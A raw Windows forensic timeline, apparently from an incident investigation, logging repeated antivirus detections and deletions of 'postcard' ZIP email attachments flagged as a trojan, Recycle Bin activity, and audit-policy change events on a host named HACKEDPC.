11/03/08 16:56:00 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:56:00 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/03/08 16:56:00 modified postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/04/08 14:52:00 deleted Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive
11/04/08 14:52:00 modified Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive
11/05/08 7:50:31 Deleted postcard1.zip C:\program files\qualcomm\eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/06/08 7:28:54 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/06/08 7:28:54 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/06/08 7:28:54 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/10/08 7:38:20 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/10/08 7:38:20 Deleted postcard2.zip C:\program files\qualcomm\eudora\attach\postcard2.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/10/08 7:38:21 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/10/08 7:38:21 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/10/08 16:23:04 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/10/08 16:23:04 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/12/08 7:37:53 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/12/08 7:37:53 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/12/08 7:37:53 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/12/08 7:37:54 created postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/12/08 7:37:54 Deleted postcard3.zip C:\program files\qualcomm\eudora\attach\postcard3.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/12/08 7:37:59 Deleted postcard3.zip C:\program files\qualcomm\eudora\attach\postcard3.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/12/08 7:38:00 accessed postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/12/08 7:38:00 written postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:28:32 created postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:28:32 Deleted postcard4.zip C:\program files\qualcomm\eudora\attach\postcard4.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/13/08 7:28:35 accessed postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:28:35 written postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:59:28 deleted postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:59:28 modified postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:59:30 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:59:30 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: smith.99999; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x18CEA)
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: smith.99999; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x18CEA)
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: HACKEDPC$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: smith.99999; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x18CEA)
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: smith.99999; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x18CEA)
11/13/08 7:59:31 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:59:31 modified postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:59:32 deleted postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:59:32 modified postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:59:33 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 7:59:33 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/13/08 9:30:54 created PSCT8500.EXE-0492DFC4.pf C:\WINDOWS\Prefetch\PSCT8500.EXE-0492DFC4.pf
11/13/08 10:29:54 Deleted postcard.zip C:\Program Files\Qualcomm\Eudora\attach\postcard.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/13/08 11:29:53 Deleted postcard.zip C:\Program Files\Qualcomm\Eudora\attach\postcard.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/14/08 7:32:25 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/14/08 7:32:25 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/14/08 7:32:25 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/14/08 13:42:06 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/14/08 16:19:05 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/17/08 7:17:57 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/17/08 7:18:02 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/18/08 8:01:09 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/18/08 8:01:10 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/18/08 8:01:14 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/18/08 8:01:14 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/18/08 8:01:14 Deleted postcard1.zip C:\Program Files\Qualcomm\Eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/18/08 14:59:22 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/18/08 14:59:22 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/18/08 14:59:22 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
11/19/08 7:41:40 accessed postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/19/08 7:41:40 created postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/19/08 7:41:40 written postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
11/20/08 7:31:26 accessed postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/20/08 7:31:26 created postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/20/08 7:31:26 written postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
11/20/08 7:31:27 Deleted postcard5.zip C:\Program Files\Qualcomm\Eudora\attach\postcard5.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/21/08 7:56:03 accessed postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
11/21/08 7:56:03 accessed postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive
11/21/08 7:56:03 created postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
11/21/08 7:56:03 created postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive
11/21/08 7:56:03 written postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
11/21/08 7:56:03 written postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive
11/24/08 7:53:52 Deleted postcard7.zip C:\Program Files\Qualcomm\Eudora\attach\postcard7.zip Generic Malware.a!zip (Trojan) C:\Program Files\Qualcomm\Eudora\Eudora.exe
11/24/08 16:56:01 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/24/08 16:56:01 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/25/08 16:48:42 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/25/08 16:48:42 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
11/26/08 7:43:08 accessed A0061054.ini C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\A0061054.ini Initialization Windows File, Deleted, Overwritten, Archive, Compressed, Not Indexed
11/26/08 7:43:08 modified A0061054.ini C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\A0061054.ini Initialization Windows File, Deleted, Overwritten, Archive, Compressed, Not Indexed
11/26/08 7:43:08 written A0061054.ini C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\A0061054.ini Initialization Windows File, Deleted, Overwritten, Archive, Compressed, Not Indexed
11/26/08 8:03:43 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/26/08 8:03:43 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/26/08 8:03:43 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
11/26/08 8:03:44 created 
postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 8:03:45 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 8:03:45 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/26/08 11:31:12 accessed _REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005File, Deleted, Overwritten, Hidden, Archive, Compressed, Not Indexed11/26/08 11:31:12 modified _REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005File, Deleted, Overwritten, Hidden, Archive, Compressed, Not Indexed12/01/08 7:34:56 accessed postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 7:34:56 created postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 7:34:56 written postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 7:34:57 accessed postcard8.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive12/01/08 7:34:57 created postcard8.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive12/01/08 7:34:57 written postcard8.zip 
C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive12/01/08 11:24:28 accessed postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 11:24:28 created postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 11:24:28 written postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:53 deleted postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:53 deleted postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:53 modified postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:53 modified postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 deleted postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 modified postcard2.zip 
C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/01/08 16:30:54 modified postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 10:21:15 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 10:21:15 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 10:21:15 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 16:31:20 deleted postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/02/08 16:31:20 modified postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 7:38:22 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 7:38:22 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 7:38:22 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 8:55:19 accessed postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 8:55:19 created postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 8:55:19 written postcard3.zip 
C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 11:38:08 accessed postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 11:38:08 created postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 11:38:08 written postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 16:31:07 deleted postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/04/08 16:31:07 modified postcard7.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard7.zip ZIP Compressed Archive Match File, Recycled, Archive12/05/08 11:12:40 accessed postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/05/08 11:12:40 created postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/05/08 11:12:40 written postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive12/08/08 16:34:26 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/08/08 16:34:26 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/08/08 16:34:27 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/08/08 16:34:27 modified postcard.zip 
C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/09/08 12:35:17 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/09/08 12:35:17 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/09/08 12:35:17 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:32 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:32 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:32 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:34 accessed postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:34 created postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 8:22:34 written postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 16:10:54 deleted postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 16:10:54 modified postcard9.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard9.zip ZIP Compressed Archive Match File, Recycled, Archive12/11/08 16:10:55 deleted postcard8.zip 
C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive12/11/08 16:10:55 modified postcard8.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard8.zip ZIP Compressed Archive File, Recycled, Archive
12/12/08 15:45:56 accessed Mike.mbx C:\Program Files\Qualcomm\Eudora\Mike.mbx12/12/08 15:58:43 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive12/12/08 15:58:43 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
12/15/08 8:36:22 created WINWORD.EXE-33AEA629.pf C:\WINDOWS\Prefetch\WINWORD.EXE-33AEA629.pf
12/15/08 9:35:04 accessed Previous search.mbx C:\Program Files\Qualcomm\Eudora\Previous search.mbx
12/15/08 11:28:19 modified postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
12/15/08 11:28:20 deleted postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
12/15/08 11:28:20 deleted postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive
12/15/08 11:28:20 modified postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive
12/15/08 11:28:21 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
12/15/08 11:28:21 modified postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive
12/16/08 10:00:25 deleted postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
12/16/08 10:00:25 modified postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive
12/17/08 8:21:18 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
12/17/08 8:21:18 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
